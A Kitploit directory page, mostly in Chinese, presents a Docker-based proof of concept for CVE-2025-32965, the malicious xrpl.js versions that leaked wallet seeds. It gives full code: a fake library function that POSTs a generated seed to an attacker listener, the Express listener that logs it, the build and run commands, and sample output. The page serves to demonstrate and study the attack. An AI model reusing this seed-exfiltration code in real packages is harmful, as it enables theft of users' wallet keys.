Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32965-xrpl-js-poc — CVE编号: CVE-2025-32965 漏洞类型: 供应链攻击 (CWE-506: 嵌入的恶意代码) 目标: xrpl.js库的4.2.1–4.2.4和2.14.2版本 影响: 用户的钱包种子/密钥数据被发送给攻击者 | Kitploit
工具/GitHubGitHub/yusufdalbudak/cve-2025-32965-xrpl-js-poc
漏洞分析漏洞利用数据泄露恶意软件分析供应链安全学习与教育
GitHubyusufdalbudak/cve-2025-32965-xrpl-js-poc

CVE-2025-32965-xrpl-js-poc

CVE编号: CVE-2025-32965 漏洞类型: 供应链攻击 (CWE-506: 嵌入的恶意代码) 目标: xrpl.js库的4.2.1–4.2.4和2.14.2版本 影响: 用户的钱包种子/密钥数据被发送给攻击者

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
51年前尚未审核
分享

CVE-2025-32965 — xrpl.js 供应链攻击 PoC 报告

漏洞描述

  • CVE 代码: CVE-2025-32965
  • 漏洞类型: 供应链攻击 (CWE-506: Embedded Malicious Code)
  • 目标: xrpl.js 库的 4.2.1–4.2.4 和 2.14.2 版本
  • 影响: 用户钱包种子/秘密数据被发送给攻击者

目标

本 PoC 旨在演示恶意 xrpl.js 版本如何在隔离环境中执行种子数据泄露。

环境结构

  • 平台: Docker (基于 WSL 的 Ubuntu)
  • 网络: 名为 xrplnet 的自定义 Docker 网络
  • 容器:
    • poc-listener: 收集种子数据的攻击者服务器
    • xrpl-poc: 包含受害者端测试脚本的 PoC 容器

使用的文件

package.json:

root@kitploit:~
{
  "name": "xrpl-poc",
  "version": "1.0.0",
  "main": "test.js",
  "dependencies": {
    "express": "^4.18.2",
    "body-parser": "^1.20.2",
    "xrpl": "^2.7.1"
  }
}

Dockerfile:

root@kitploit:~
FROM node:20
WORKDIR /app
COPY . .
RUN npm install
CMD [ "node", "test.js" ]

fake_xrpl.js:

root@kitploit:~
async function checkValidityOfSeed(seed) {
  const res = await fetch("http://poc-listener:3000/xcm", {
    method: "POST",
    body: seed,
    headers: {
      "Content-Type": "text/plain",
      "User-Agent": "r3v3r5e-poc"
    }
  });
  console.log(" Seed gönderildi:", seed);
}

module.exports = { checkValidityOfSeed };

test.js:

root@kitploit:~
const xrpl = require("xrpl")
const { checkValidityOfSeed } = require("./fake_xrpl")

const wallet = xrpl.Wallet.generate()
console.log("  Oluşturulan cüzdan:")
console.log("Seed:", wallet.seed)
console.log("Address:", wallet.classicAddress)

checkValidityOfSeed(wallet.seed)

server.js:

root@kitploit:~
const express = require('express')
const bodyParser = require('body-parser')
const app = express()

app.use(bodyParser.text())

app.post("/xcm", (req, res) => {
  console.log("  Çalınan SEED =>", req.body)
  res.send("OK")
})

app.listen(3000, () => {
  console.log(" Listener aktif: http://poc-listener:3000/xcm")
})

步骤

  1. Docker 构建:
root@kitploit:~
docker build -t xrpl-poc .
docker network create xrplnet
  1. 启动监听器:
root@kitploit:~
docker run -it --rm --network xrplnet --name poc-listener xrpl-poc node server.js
  1. 受害者发送种子:
root@kitploit:~
docker run -it --rm --network xrplnet xrpl-poc node test.js

输出示例

受害者终端:

root@kitploit:~
  Oluşturulan cüzdan:
Seed: sEd79cMs56cynRVYoXVkk1pn8uYcVqr
Address: rHvx6Xups5uR62QiC31aZeMSMnCFT62fgC
  Seed gönderildi: sEd79cMs56cynRVYoXVkk1pn8uYcVqr

攻击者终端:

root@kitploit:~
  Listener aktif: http://poc-listener:3000/xcm
  Çalınan SEED => sEd79cMs56cynRVYoXVkk1pn8uYcVqr

结论

本 PoC 展示了 CVE-2025-32965 漏洞在实践中的利用方式。恶意 xrpl.js 库中的种子数据泄露代码已在隔离测试环境中成功执行,并将数据泄露给攻击者服务器。

GitHub 仓库结构(建议)

root@kitploit:~
xrpl-poc/
├── Dockerfile
├── package.json
├── test.js
├── fake_xrpl.js
├── server.js
└── README.md

编写者: Yusuf Dalbudak 测试环境: WSL2 + Docker + Node.js v20

下载工具